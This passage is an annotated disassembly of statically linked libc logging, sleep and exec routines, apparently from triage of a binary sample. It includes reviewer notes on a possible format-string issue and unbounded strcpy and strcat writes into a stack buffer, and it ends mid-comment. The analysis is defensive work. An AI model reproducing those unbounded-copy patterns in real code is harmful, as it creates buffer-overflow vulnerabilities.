;   Buffers: var_800 is the 800h-byte record, var_C00 the 400h-byte copy of
;   the format with "%m" expanded.
;   Steps visible below:
;     1. drop the call if the mask bit for (arg_0 & 7) in dword_80788A4 is
;        clear or if arg_0 has bits outside 3FFh;
;     2. (re)open the log via sub_80552B0 when no descriptor / no connection;
;     3. format "<pri>timestamp ", then ident, optional "[pid]", then ": ";
;     4. copy the format into var_C00, expanding "%m" from the errno value
;        saved on entry and keeping "%%" intact;
;     5. format the message after the header with sub_80628A8;
;     6. write the record, falling back to /dev/console when option bit 2 is
;        set and the write did not complete.
;   NOTE(review): the strings "<%d>%.15s ", "[%d]", "[truncated] " and
;   "/dev/console" match a libc vsyslog implementation; this is library code
;   pulled in by static linking rather than logic specific to the sample.
;   NOTE(review): arg_4 is interpreted as a format string. When auditing the
;   callers of sub_8054EB0 (getanswer+280, getanswer+3CE, ...), confirm the
;   format argument is a constant and that external data only arrives through
;   the variadic arguments.
sub_8054EC8 proc near                   ; CODE XREF: sub_8054EB0+Fp
var_C30 = byte ptr -0C30h
var_C24 = byte ptr -0C24h
var_C20 = dword ptr -0C20h
var_C1C = dword ptr -0C1Ch
var_C18 = dword ptr -0C18h
var_C14 = dword ptr -0C14h
var_C10 = dword ptr -0C10h
var_C0C = dword ptr -0C0Ch
var_C08 = dword ptr -0C08h
var_C04 = byte ptr -0C04h
var_C00 = byte ptr -0C00h
var_802 = byte ptr -802h
var_801 = byte ptr -801h
var_800 = byte ptr -800h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
                push ebp
                mov ebp, esp
                sub esp, 0C24h
                push edi
                push esi
                push ebx
                mov esi, [ebp+arg_0]
                ; save errno on entry; it is the value "%m" expands later
                mov edx, __errno
                mov [ebp+var_C1C], edx
                ; mask test: bit (arg_0 & 7) of dword_80788A4 must be set
                mov ecx, esi
                and ecx, 7
                mov eax, dword_80788A4
                sar eax, cl
                test al, 1
                jz loc_80552A1
                ; reject priorities with bits outside 3FFh
                test esi, 0FFFFFC00h
                jnz loc_80552A1
                ; open/connect the log if there is no descriptor or no connection
                cmp dword_8078894, 0
                jl short loc_8054F15
                cmp ds:dword_807AC58, 0
                jnz short loc_8054F2D

loc_8054F15:                            ; CODE XREF: sub_8054EC8+42j
                ; sub_80552B0(current ident, current options | 8, 0)
                push 0
                mov eax, dword_8078898
                or al, 8
                push eax
                mov eax, dword_807889C
                push eax
                call sub_80552B0
                add esp, 0Ch

loc_8054F2D:                            ; CODE XREF: sub_8054EC8+4Bj
                ; no facility bits (3F8h) supplied: OR in the default facility
                test esi, 3F8h
                jnz short loc_8054F3B
                or esi, dword_80788A0

loc_8054F3B:                            ; CODE XREF: sub_8054EC8+6Bj
                ; header: sub_8062888(var_800, 800h, "<%d>%.15s ", pri, text+4)
                ; where text is the result of sub_805B548(&var_C04) after time()
                ; NOTE(review): sub_805B548 presumably ctime; +4 would skip the
                ; weekday name - confirm
                lea ebx, [ebp+var_C04]
                push ebx
                call time
                push ebx
                call sub_805B548
                add eax, 4
                push eax
                push esi
                push offset aD_15s ; "<%d>%.15s "
                push 800h
                lea ebx, [ebp+var_800]
                push ebx
                call sub_8062888
                mov esi, ebx
                add esp, 1Ch
                ; advance esi to the terminating NUL of what has been written
                cmp [ebp+var_800], 0
                jz short loc_8054F7E
                lea esi, [esi]

loc_8054F78:                            ; CODE XREF: sub_8054EC8+B4j
                inc esi
                cmp byte ptr [esi], 0
                jnz short loc_8054F78

loc_8054F7E:                            ; CODE XREF: sub_8054EC8+ACj
                ; option bit 20h: remember where the text after the header starts
                ; (used for the fd 2 copy further down)
                test byte ptr dword_8078898, 20h
                jz short loc_8054F8D
                mov [ebp+var_C20], esi

loc_8054F8D:                            ; CODE XREF: sub_8054EC8+BDj
                cmp dword_807889C, 0
                jz short loc_8054FB2
                ; NOTE(review): the ident is appended with strcpy, i.e. without a
                ; length bound, while every other write into var_800 passes an
                ; explicit size. The ident pointer comes from dword_807889C (set
                ; by sub_80552B0 or reset to "syslog" by sub_8054E54), so the
                ; exposure depends on how long an ident callers register.
                mov eax, dword_807889C
                push eax
                push esi
                call strcpy
                add esp, 8
                cmp byte ptr [esi], 0
                jz short loc_8054FB2
                lea esi, [esi]

loc_8054FAC:                            ; CODE XREF: sub_8054EC8+E8j
                inc esi
                cmp byte ptr [esi], 0
                jnz short loc_8054FAC

loc_8054FB2:                            ; CODE XREF: sub_8054EC8+CCj
                                        ; sub_8054EC8+E0j
                ; option bit 1: append "[pid]"; size passed is ebp - esi, the
                ; space left before the end of var_800
                test byte ptr dword_8078898, 1
                jz short loc_8054FE2
                call getpid
                push eax
                push offset aD ; "[%d]"
                mov eax, ebp
                sub eax, esi
                push eax
                push esi
                call sub_8062888
                add esp, 10h
                cmp byte ptr [esi], 0
                jz short loc_8054FE2
                db 8Dh,76h,0 ; lea esi, [esi+0]

loc_8054FDC:                            ; CODE XREF: sub_8054EC8+118j
                inc esi
                cmp byte ptr [esi], 0
                jnz short loc_8054FDC

loc_8054FE2:                            ; CODE XREF: sub_8054EC8+F1j
                                        ; sub_8054EC8+10Fj
                ; with an ident present, append ':' ' ' and a NUL (no bound check)
                cmp dword_807889C, 0
                jz short loc_8054FF6
                mov byte ptr [esi], 3Ah
                inc esi
                mov byte ptr [esi], 20h
                inc esi
                mov byte ptr [esi], 0

loc_8054FF6:                            ; CODE XREF: sub_8054EC8+121j
                ; ebx = write cursor in var_C00, the expanded-format buffer
                lea ebx, [ebp+var_C00]
                jmp loc_8055108
; ---------------------------------------------------------------------------
                db 8Dh, 76h, 0
; ---------------------------------------------------------------------------

loc_8055004:                            ; CODE XREF: sub_8054EC8+24Dj
                ; format copy loop: stop once ebx reaches the last byte of
                ; var_C00 (var_801)
                lea eax, [ebp+var_801]
                cmp ebx, eax
                jnb loc_805511B
                cmp [ebp+var_C24], 25h
                jnz loc_80550FC
                ; "%%" is copied through as two bytes if both still fit
                mov edx, [ebp+arg_4]
                cmp byte ptr [edx+1], 25h
                jnz short loc_8055074
                lea eax, [ebp+var_802]
                cmp ebx, eax
                jnb short loc_8055044
                mov byte ptr [ebx], 25h
                inc ebx
                mov byte ptr [ebx], 25h
                inc ebx
                inc edx
                mov [ebp+arg_4], edx
                jmp loc_8055105
; ---------------------------------------------------------------------------
                align 4

loc_8055044:                            ; CODE XREF: sub_8054EC8+168j
                ; out of room: tag the record via sub_80553A0 and re-find its end
                push offset aTruncated ; "[truncated] "
                push 800h
                lea eax, [ebp+var_800]
                push eax
                call sub_80553A0
                add esp, 0Ch
                cmp byte ptr [esi], 0
                jz loc_805511B
                lea esi, [esi]

loc_8055068:                            ; CODE XREF: sub_8054EC8+1A4j
                inc esi
                cmp byte ptr [esi], 0
                jnz short loc_8055068
                jmp loc_805511B
; ---------------------------------------------------------------------------
                align 4

loc_8055074:                            ; CODE XREF: sub_8054EC8+15Ej
                ; "%m": expand the errno value saved on entry as "%s" text
                cmp [ebp+var_C24], 25h
                jnz short loc_80550FC
                mov edx, [ebp+arg_4]
                cmp byte ptr [edx+1], 6Dh
                jnz short loc_80550FC
                inc edx
                mov [ebp+arg_4], edx
                ; edi = bytes left in var_C00 = (ebp - ebx) - 800h
                mov eax, ebp
                sub eax, ebx
                lea edi, [eax-800h]
                ; NOTE(review): sub_80566A4(saved errno) presumably strerror
                mov edx, [ebp+var_C1C]
                push edx
                call sub_80566A4
                push eax
                push offset aS ; "%s"
                push edi
                push ebx
                call sub_8062888
                add esp, 14h
                ; -1 or a result above the remaining size counts as truncation
                cmp eax, 0FFFFFFFFh
                jz short loc_80550B9
                cmp eax, edi
                jle short loc_80550EC

loc_80550B9:                            ; CODE XREF: sub_8054EC8+1EBj
                push offset aTruncated ; "[truncated] "
                push 800h
                lea eax, [ebp+var_800]
                push eax
                call sub_80553A0
                add esp, 0Ch
                cmp byte ptr [esi], 0
                jz short loc_80550DE
                nop

loc_80550D8:                            ; CODE XREF: sub_8054EC8+214j
                inc esi
                cmp byte ptr [esi], 0
                jnz short loc_80550D8

loc_80550DE:                            ; CODE XREF: sub_8054EC8+20Dj
                cmp byte ptr [ebx], 0
                jz short loc_805511B
                nop

loc_80550E4:                            ; CODE XREF: sub_8054EC8+220j
                inc ebx
                cmp byte ptr [ebx], 0
                jnz short loc_80550E4
                jmp short loc_805511B
; ---------------------------------------------------------------------------

loc_80550EC:                            ; CODE XREF: sub_8054EC8+1EFj
                ; expansion fitted: move ebx to the end of the expanded text
                cmp byte ptr [ebx], 0
                jz short loc_8055105
                db 8Dh,76h,0 ; lea esi, [esi+0]

loc_80550F4:                            ; CODE XREF: sub_8054EC8+230j
                inc ebx
                cmp byte ptr [ebx], 0
                jnz short loc_80550F4
                jmp short loc_8055105
; ---------------------------------------------------------------------------

loc_80550FC:                            ; CODE XREF: sub_8054EC8+151j
                                        ; sub_8054EC8+1B3j ...
                ; ordinary character: copy it through unchanged
                mov dl, [ebp+var_C24]
                mov [ebx], dl
                inc ebx

loc_8055105:                            ; CODE XREF: sub_8054EC8+176j
                                        ; sub_8054EC8+227j ...
                inc [ebp+arg_4]

loc_8055108:                            ; CODE XREF: sub_8054EC8+134j
                ; fetch the next format byte into var_C24; NUL ends the loop
                mov edx, [ebp+arg_4]
                mov dl, [edx]
                mov [ebp+var_C24], dl
                test dl, dl
                jnz loc_8055004

loc_805511B:                            ; CODE XREF: sub_8054EC8+144j
                                        ; sub_8054EC8+198j ...
                ; terminate the expanded format; a non-NUL var_C24 means the loop
                ; stopped early, so the record gets the truncation tag
                mov byte ptr [ebx], 0
                cmp [ebp+var_C24], 0
                jz short loc_805514E
                push offset aTruncated ; "[truncated] "
                push 800h
                lea eax, [ebp+var_800]
                push eax
                call sub_80553A0
                add esp, 0Ch
                cmp byte ptr [esi], 0
                jz short loc_805514E
                db 8Dh,76h,0 ; lea esi, [esi+0]

loc_8055148:                            ; CODE XREF: sub_8054EC8+284j
                inc esi
                cmp byte ptr [esi], 0
                jnz short loc_8055148

loc_805514E:                            ; CODE XREF: sub_8054EC8+25Dj
                                        ; sub_8054EC8+27Bj
                ; message body: sub_80628A8(esi, ebp - esi, var_C00, arg_8)
                ; NOTE(review): presumably vsnprintf; the size is the space left
                ; in var_800
                mov edi, ebp
                sub edi, esi
                mov edx, [ebp+arg_8]
                push edx
                lea eax, [ebp+var_C00]
                push eax
                push edi
                push esi
                call sub_80628A8
                add esp, 10h
                cmp eax, 0FFFFFFFFh
                jz short loc_8055170
                cmp eax, edi
                jle short loc_805518D

loc_8055170:                            ; CODE XREF: sub_8054EC8+2A2j
                push offset aTruncated ; "[truncated] "
                push 800h
                lea eax, [ebp+var_800]
                push eax
                call sub_80553A0
                add esp, 0Ch
                jmp short loc_805518D
; ---------------------------------------------------------------------------
                align 4

loc_805518C:                            ; CODE XREF: sub_8054EC8+2C8j
                inc esi

loc_805518D:                            ; CODE XREF: sub_8054EC8+2A6j
                                        ; sub_8054EC8+2C1j
                ; var_C18 = length of the finished record
                cmp byte ptr [esi], 0
                jnz short loc_805518C
                lea eax, [ebp+var_800]
                sub esi, eax
                mov [ebp+var_C18], esi
                ; option bit 20h: send the text after the header plus "\n" to
                ; descriptor 2 as two (pointer, length) pairs at var_C14..var_C08
                ; NOTE(review): sub_8056E70(2, &pairs, 2) presumably writev
                test byte ptr dword_8078898, 20h
                jz short loc_80551EE
                mov edx, [ebp+var_C20]
                mov [ebp+var_C14], edx
                sub edx, eax
                mov eax, edx
                mov edx, [ebp+var_C18]
                sub edx, eax
                mov [ebp+var_C10], edx
                mov [ebp+var_C0C], offset asc_8067FB3 ; "\n"
                mov [ebp+var_C08], 1
                push 2
                lea eax, [ebp+var_C14]
                push eax
                push 2
                call sub_8056E70
                add esp, 0Ch

loc_80551EE:                            ; CODE XREF: sub_8054EC8+2DFj
                ; esi = start of record, ebx = address of its terminating NUL
                lea esi, [ebp+var_800]
                mov ebx, [ebp+var_C18]
                add ebx, esi

loc_80551FC:                            ; CODE XREF: sub_8054EC8+374j
                ; write(log fd, esi, ebx - esi + 1): the NUL is sent as well
                mov eax, ebx
                sub eax, esi
                inc eax
                push eax
                push esi
                mov eax, dword_8078894
                push eax
                call write
                add esp, 0Ch
                test eax, eax
                jge short loc_8055238
                ; errno 0Bh or 4 (EAGAIN / EINTR in Linux numbering): count the
                ; attempt as 0 bytes and retry immediately, with no back-off
                cmp __errno, 0Bh
                jz short loc_8055227
                cmp __errno, 4
                jnz short loc_805522C

loc_8055227:                            ; CODE XREF: sub_8054EC8+354j
                xor eax, eax
                jmp short loc_8055238
; ---------------------------------------------------------------------------
                align 4

loc_805522C:                            ; CODE XREF: sub_8054EC8+35Dj
                ; any other error: close the log descriptor, keep the settings
                push 0
                call sub_8054E54
                add esp, 4
                jmp short loc_805523E
; ---------------------------------------------------------------------------

loc_8055238:                            ; CODE XREF: sub_8054EC8+34Bj
                                        ; sub_8054EC8+361j
                add esi, eax
                cmp esi, ebx
                jbe short loc_80551FC

loc_805523E:                            ; CODE XREF: sub_8054EC8+36Ej
                ; everything written: done. Otherwise, with option bit 2 set,
                ; fall back to /dev/console
                cmp esi, ebx
                ja short loc_80552A1
                test byte ptr dword_8078898, 2
                jz short loc_80552A1
                push 0
                push 1
                push offset aDevConsole ; "/dev/console"
                call open
                mov edi, eax
                add esp, 0Ch
                test edi, edi
                jl short loc_80552A1
                ; append "\r\n" (sub_80577C0, presumably strcat - no bound is
                ; passed) and write the text that follows the first '>'
                push offset asc_8067FC2 ; "\r\n"
                lea ebx, [ebp+var_800]
                push ebx
                call sub_80577C0
                add [ebp+var_C18], 2
                push 3Eh
                push ebx
                call strchr
                lea esi, [eax+1]
                mov eax, esi
                sub eax, ebx
                mov edx, [ebp+var_C18]
                sub edx, eax
                mov eax, edx
                push eax
                push esi
                push edi
                call write
                push edi
                call close

loc_80552A1:                            ; CODE XREF: sub_8054EC8+29j
                                        ; sub_8054EC8+35j ...
                lea esp, [ebp+var_C30]
                pop ebx
                pop esi
                pop edi
                mov esp, ebp
                pop ebp
                retn
sub_8054EC8 endp

; ---------------------------------------------------------------------------
                db 8Dh, 36h

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; sub_80552B0(arg_0 = ident, arg_4 = options, arg_8 = facility)
;   Stores the logging settings and makes sure a socket to "/dev/log" exists.
;   A NULL ident keeps the previous one; the facility is stored only when it
;   is non-zero and has no bits in 0FFFFFC07h. The function continues past
;   the end of this span.
;   NOTE(review): consistent with libc openlog; called from gethostbyaddr and
;   from sub_8054EC8, so it is reached from library code paths.
sub_80552B0 proc near                   ; CODE XREF: gethostbyaddr+207p
                                        ; sub_8054EC8+5Dp
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
                push ebp
                mov ebp, esp
                push edi
                mov edx, [ebp+arg_0]
                mov ecx, [ebp+arg_4]
                mov eax, [ebp+arg_8]
                test edx, edx
                jz short loc_80552C7
                mov dword_807889C, edx

loc_80552C7:                            ; CODE XREF: sub_80552B0+Fj
                mov dword_8078898, ecx
                test eax, eax
                jz short loc_80552DD
                test eax, 0FFFFFC07h
                jnz short loc_80552DD
                mov dword_80788A0, eax

loc_80552DD:                            ; CODE XREF: sub_80552B0+1Fj
                                        ; sub_80552B0+26j
                ; no descriptor yet: fill in the address (family word = 1, path
                ; "/dev/log" copied with a 0Eh-byte limit)
                cmp dword_8078894, 0FFFFFFFFh
                jnz short loc_805532D
                mov ds:word_807AC5C, 1
                push 0Eh
                push offset aDevLog ; "/dev/log"
                push offset unk_807AC5E
                call strncpy
                add esp, 0Ch
                ; option bit 8: create the socket now - socket(1, 1, 0), i.e.
                ; AF_UNIX / SOCK_STREAM in Linux numbering
                test byte ptr dword_8078898, 8
                jz short loc_8055324
                push 0
                push 1
                push 1
                call socket
                mov dword_8078894, eax
                add esp, 0Ch
                cmp eax, 0FFFFFFFFh
                jz short loc_805536A

loc_8055324:                            ; CODE XREF: sub_80552B0+5Aj
                cmp dword_8078894, 0FFFFFFFFh
                jz short loc_805536A

loc_805532D:                            ; CODE XREF: sub_80552B0+34j
                ; dword_807AC58 is the "already connected" flag tested next
                cmp ds:dword_807AC58, 0
; Tail of sub_80552B0 (its proc line and first half precede this span).
; Skips the connect when dword_807AC58 is already non-zero; otherwise connects
; the descriptor in dword_8078894 to the address at word_807AC5C and sets
; dword_807AC58 = 1 on success. A failed connect is not reported to the caller.
                jnz short loc_805536A
                ; address length = strlen(path at unk_807AC5E) + 2
                xor al, al
                mov edi, offset unk_807AC5E
                cld
                mov ecx, 0FFFFFFFFh
                repne scasb
                mov eax, ecx
                not eax
                inc eax
                push eax
                push offset word_807AC5C
                mov eax, dword_8078894
                push eax
                call connect
                cmp eax, 0FFFFFFFFh
                jz short loc_805536A
                mov ds:dword_807AC58, 1

loc_805536A:                            ; CODE XREF: sub_80552B0+72j
                                        ; sub_80552B0+7Bj ...
                mov edi, [ebp+var_4]
                mov esp, ebp
                pop ebp
                retn
sub_80552B0 endp

; ---------------------------------------------------------------------------
                db 8Dh, 76h, 0

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; sub_8055374()
;   Calls sub_8054E54(1): close the log descriptor and reset the logging
;   settings to their defaults. No cross-reference is listed on the proc line.
;   NOTE(review): presumably the public closelog entry point - confirm.
sub_8055374 proc near
                push ebp
                mov ebp, esp
                push 1
                call sub_8054E54
                mov esp, ebp
                pop ebp
                retn
sub_8055374 endp

; ---------------------------------------------------------------------------
                db 8Dh, 36h

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; sub_8055384(arg_0)
;   Returns the current value of dword_80788A4 and, when arg_0 is non-zero,
;   replaces it with arg_0. No cross-reference is listed on the proc line.
;   NOTE(review): dword_80788A4 is the priority mask tested at the top of
;   sub_8054EC8, so this is presumably setlogmask - confirm.
sub_8055384 proc near
arg_0 = dword ptr 8
                push ebp
                mov ebp, esp
                mov edx, [ebp+arg_0]
                ; eax = old mask, returned in both cases
                mov eax, dword_80788A4
                test edx, edx
                jz short loc_8055399
                mov dword_80788A4, edx

loc_8055399:                            ; CODE XREF: sub_8055384+Dj
                mov esp, ebp
                pop ebp
                retn
sub_8055384 endp

; ---------------------------------------------------------------------------
                db 8Dh, 76h, 0

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
sub_80553A0 proc near                   ; CODE XREF: sub_8054EC8+18Dp
                                        ; sub_8054EC8+202p ...
; Body of sub_80553A0 (its proc line immediately precedes this span).
;
; sub_80553A0(arg_0 = buffer, arg_4 = buffer size, arg_8 = marker string)
;   Inserts the marker string into the record in arg_0, after an optional
;   "<n>" priority prefix and an optional 16-byte timestamp-shaped prefix.
;   Does nothing when arg_0 or arg_8 is NULL, when the marker is empty, or
;   when the marker is already present at the insertion point. Existing text
;   is shifted right and cut so the result stays within arg_4 bytes.
;   All call sites shown pass the 800h-byte record of sub_8054EC8 together
;   with "[truncated] ".
;   NOTE(review): dword_8078FA0 is indexed as [table + c*2 + 1] and tested
;   against 8 and 4 - presumably a ctype-style class table where 8 marks
;   digits and 4 marks letters; confirm.
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
                push ebp
                mov ebp, esp
                sub esp, 4
                push edi
                push esi
                push ebx
                cmp [ebp+arg_0], 0
                jz loc_80555A4
                cmp [ebp+arg_8], 0
                jz loc_80555A4
                ; edi = strlen(marker)
                xor al, al
                mov edi, [ebp+arg_8]
                cld
                mov ecx, 0FFFFFFFFh
                repne scasb
                mov eax, ecx
                not eax
                lea edi, [eax-1]
                test edi, edi
                jz loc_80555A4
                ; skip "<d>", "<dd>" or "<ddd>" at the start of the buffer
                mov ebx, [ebp+arg_0]
                cmp byte ptr [ebx], 3Ch
                jnz short loc_8055431
                movzx edx, byte ptr [ebx+1]
                mov eax, dword_8078FA0
                test byte ptr [eax+edx*2+1], 8
                jz short loc_8055431
                cmp byte ptr [ebx+2], 3Eh
                jnz short loc_80553FC
                add ebx, 3
                jmp short loc_8055431
; ---------------------------------------------------------------------------

loc_80553FC:                            ; CODE XREF: sub_80553A0+55j
                movzx edx, byte ptr [ebx+2]
                mov eax, dword_8078FA0
                test byte ptr [eax+edx*2+1], 8
                jz short loc_8055431
                cmp byte ptr [ebx+3], 3Eh
                jnz short loc_8055418
                add ebx, 4
                jmp short loc_8055431
; ---------------------------------------------------------------------------
                align 4

loc_8055418:                            ; CODE XREF: sub_80553A0+70j
                movzx edx, byte ptr [ebx+3]
                mov eax, dword_8078FA0
                test byte ptr [eax+edx*2+1], 8
                jz short loc_8055431
                cmp byte ptr [ebx+4], 3Eh
                jnz short loc_8055431
                add ebx, 5

loc_8055431:                            ; CODE XREF: sub_80553A0+3Fj
                                        ; sub_80553A0+4Fj ...
                ; skip a 16-byte prefix shaped like "LLL ?d dd:dd:dd " (three
                ; class-4 bytes, space, space-or-class-8, class-8, space, then
                ; dd:dd:dd and a space); any mismatch leaves ebx where it is
                movzx eax, byte ptr [ebx]
                mov edx, dword_8078FA0
                test byte ptr [edx+eax*2+1], 4
                jz loc_80554E8
                movzx eax, byte ptr [ebx+1]
                test byte ptr [edx+eax*2+1], 4
                jz loc_80554E8
                movzx eax, byte ptr [ebx+2]
                test byte ptr [edx+eax*2+1], 4
                jz loc_80554E8
                cmp byte ptr [ebx+3], 20h
                jnz short loc_80554E8
                cmp byte ptr [ebx+4], 20h
                jz short loc_805547A
                movzx eax, byte ptr [ebx+4]
                test byte ptr [edx+eax*2+1], 8
                jz short loc_80554E8

loc_805547A:                            ; CODE XREF: sub_80553A0+CDj
                movzx eax, byte ptr [ebx+5]
                mov edx, dword_8078FA0
                test byte ptr [edx+eax*2+1], 8
                jz short loc_80554E8
                cmp byte ptr [ebx+6], 20h
                jnz short loc_80554E8
                movzx eax, byte ptr [ebx+7]
                test byte ptr [edx+eax*2+1], 8
                jz short loc_80554E8
                movzx eax, byte ptr [ebx+8]
                test byte ptr [edx+eax*2+1], 8
                jz short loc_80554E8
                cmp byte ptr [ebx+9], 3Ah
                jnz short loc_80554E8
                movzx eax, byte ptr [ebx+0Ah]
                test byte ptr [edx+eax*2+1], 8
                jz short loc_80554E8
                movzx eax, byte ptr [ebx+0Bh]
                test byte ptr [edx+eax*2+1], 8
                jz short loc_80554E8
                cmp byte ptr [ebx+0Ch], 3Ah
                jnz short loc_80554E8
                movzx eax, byte ptr [ebx+0Dh]
                test byte ptr [edx+eax*2+1], 8
                jz short loc_80554E8
                movzx eax, byte ptr [ebx+0Eh]
                test byte ptr [edx+eax*2+1], 8
                jz short loc_80554E8
                cmp byte ptr [ebx+0Fh], 20h
                jnz short loc_80554E8
                add ebx, 10h

loc_80554E8:                            ; CODE XREF: sub_80553A0+9Fj
                                        ; sub_80553A0+AEj ...
                ; var_4 = bytes available from the insertion point ebx to the end
                ; of the buffer: arg_4 - (ebx - arg_0)
                mov eax, ebx
                sub eax, [ebp+arg_0]
                mov esi, [ebp+arg_4]
                sub esi, eax
                mov [ebp+var_4], esi
                mov eax, esi
                dec eax
                cmp edi, eax
                jl short loc_8055514
                ; marker does not fit in full: copy var_4 - 1 bytes of it and
                ; terminate at the last byte of the buffer
                push eax
                push ebx
                mov esi, [ebp+arg_8]
                push esi
                call bcopy
                mov esi, [ebp+var_4]
                mov byte ptr [ebx+esi-1], 0
                jmp loc_80555A4
; ---------------------------------------------------------------------------

loc_8055514:                            ; CODE XREF: sub_80553A0+15Aj
                ; sub_8056450(ebx, marker, edi) returning 0 means the marker is
                ; already there - presumably a strncmp/memcmp-style compare
                push edi
                mov esi, [ebp+arg_8]
                push esi
                push ebx
                call sub_8056450
                add esp, 0Ch
                test eax, eax
                jz short loc_80555A4
                ; cut the existing text so it still fits once shifted by edi
                mov esi, [ebp+var_4]
                lea eax, [ebx+esi-1]
                sub eax, edi
                mov byte ptr [eax], 0
                ; ecx = address of the terminating NUL (strchr with a 0 byte)
                push 0
                push ebx
                call strchr
                mov ecx, eax
                add esp, 8
                cmp ecx, ebx
                jb short loc_8055599
                ; shift [ebx..ecx] right by edi bytes, copying from the top down
                ; through a 4-way unrolled loop
                lea edx, [ebx-1]
                mov eax, edx
                sub eax, ecx
                and eax, 3
                cmp ecx, edx
                jle short loc_805556B
                test eax, eax
                jz short loc_8055578
                cmp eax, 3
                jge short loc_805556B
                cmp eax, 2
                jge short loc_8055565
                mov al, [ecx]
                mov [edi+ecx], al
                dec ecx

loc_8055565:                            ; CODE XREF: sub_80553A0+1BDj
                mov al, [ecx]
                mov [edi+ecx], al
                dec ecx

loc_805556B:                            ; CODE XREF: sub_80553A0+1AFj
                                        ; sub_80553A0+1B8j
                mov al, [ecx]
                mov [edi+ecx], al
                dec ecx
                cmp ecx, ebx
                jb short loc_8055599
                db 8Dh,76h,0 ; lea esi, [esi+0]

loc_8055578:                            ; CODE XREF: sub_80553A0+1B3j
                                        ; sub_80553A0+1F7j
                mov al, [ecx]
                mov [edi+ecx], al
                mov al, [ecx-1]
                mov [edi+ecx-1], al
                mov al, [ecx-2]
                mov [edi+ecx-2], al
                mov al, [ecx-3]
                mov [edi+ecx-3], al
                add ecx, 0FFFFFFFCh
                cmp ecx, ebx
                jnb short loc_8055578

loc_8055599:                            ; CODE XREF: sub_80553A0+1A1j
                                        ; sub_80553A0+1D3j
                ; drop the marker into the gap: bcopy(marker, ebx, edi)
                push edi
                push ebx
                mov esi, [ebp+arg_8]
                push esi
                call bcopy

loc_80555A4:                            ; CODE XREF: sub_80553A0+Dj
                                        ; sub_80553A0+17j ...
                lea esp, [ebp+var_10]
                pop ebx
                pop esi
                pop edi
                mov esp, ebp
                pop ebp
                retn
sub_80553A0 endp

; ---------------------------------------------------------------------------
                db 2 dup(90h)

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
usleep proc near                        ; CODE XREF: main+5B5p main+D89p ...
; Body of usleep (its proc line immediately precedes this span).
; Splits arg_0 (microseconds) into var_8 = arg_0 / 1,000,000 and
; var_4 = arg_0 mod 1,000,000, then calls select with n = 1, no descriptor
; sets and &var_8 as the timeout, so the call only waits. The two adjacent
; dwords are presumably a struct timeval (seconds, microseconds).
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
                push ebp
                mov ebp, esp
                sub esp, 8
                mov eax, [ebp+arg_0]
                ; 0F4240h = 1,000,000
                mov ecx, 0F4240h
                xor edx, edx
                div ecx
                mov [ebp+var_8], eax
                ; multiply the quotient by 1,000,000 with shifts:
                ; x31 -> x1953 -> x15624 -> + quotient = x15625 -> x64
                mov edx, eax
                shl edx, 5
                sub edx, eax
                mov eax, edx
                shl eax, 6
                sub eax, edx
                shl eax, 3
                add eax, [ebp+var_8]
                shl eax, 6
                ; remainder = arg_0 - quotient * 1,000,000
                mov ecx, [ebp+arg_0]
                sub ecx, eax
                mov [ebp+var_4], ecx
                lea eax, [ebp+var_8]
                push eax ; timeout
                push 0 ; exceptfds
                push 0 ; writefds
                push 0 ; readfds
                push 1 ; n
                call select
                mov esp, ebp
                pop ebp
                retn
usleep endp

; ---------------------------------------------------------------------------
                db 3 dup(90h)

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; execl(arg_0 = path, arg_4 = first argument, ...)
;   Copies the NULL-terminated variadic argument list into the local pointer
;   array var_8000 and calls execve(path, var_8000, __environ). The array is
;   8000h bytes (2000h pointers); a list that would need an index above 1FFFh
;   makes the function return 7 without calling execve.
;   NOTE(review): 7 is E2BIG in Linux numbering - confirm whether this libc
;   returns the code directly instead of setting errno.
;   NOTE(review): the only cross-reference listed is main+975. For triage this
;   is the process-launch point of the sample: the path and arguments pushed
;   at that call site in main decide what gets executed, so that call site is
;   the place to document, not this library routine.
execl proc near                         ; CODE XREF: main+975p
var_8004 = dword ptr -8004h
var_8000 = dword ptr -8000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
                push ebp
                mov ebp, esp
                sub esp, 8000h
                push ebx
                mov ebx, [ebp+arg_0]
                ; slot 0 of the array = first fixed argument
                mov eax, [ebp+arg_4]
                mov [ebp+var_8000], eax
                ; ecx walks the variadic slots, edx is the next array index
                lea ecx, [ebp+arg_8]
                mov edx, 1
                test eax, eax
                jz short loc_805564A
                lea esi, [esi]

loc_8055620:                            ; CODE XREF: execl+4Cj
                ; bound check before each store keeps the index within the array
                cmp edx, 1FFFh
                jbe short loc_8055630
                mov eax, 7
                jmp short loc_805565D
; ---------------------------------------------------------------------------
                align 4

loc_8055630:                            ; CODE XREF: execl+2Aj
                ; copy one pointer; stop after the NULL terminator is stored
                add ecx, 4
                mov eax, [ecx-4]
                mov [ebp+edx*4+var_8000], eax
                mov eax, edx
                inc edx
                cmp [ebp+eax*4+var_8000], 0
                jnz short loc_8055620

loc_805564A:                            ; CODE XREF: execl+20j
                ; the current environment is passed through unchanged
                mov eax, __environ
                push eax
                lea eax, [ebp+var_8000]
                push eax
                push ebx
                call execve

loc_805565D:                            ; CODE XREF: execl+31j
                mov ebx, [ebp+var_8004]
                mov esp, ebp
                pop ebp
                retn
execl endp

; ---------------------------------------------------------------------------
                align 4

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
secure_getenv proc near                 ; CODE XREF: init_services_resolv+22p
                                        ; init_services_resolv+A63p ...
; Body of the routine labelled secure_getenv (its proc line immediately
; precedes this span).
; Looks arg_0 up in the __environ array: for each entry it compares the first
; strlen(arg_0) bytes with strncmp and requires '=' right after them. Returns
; a pointer to the text after '=' or NULL when no entry matches.
; NOTE(review): the visible body performs only this plain lookup - there is no
; uid/gid or privilege check anywhere in it. The "secure_" label therefore
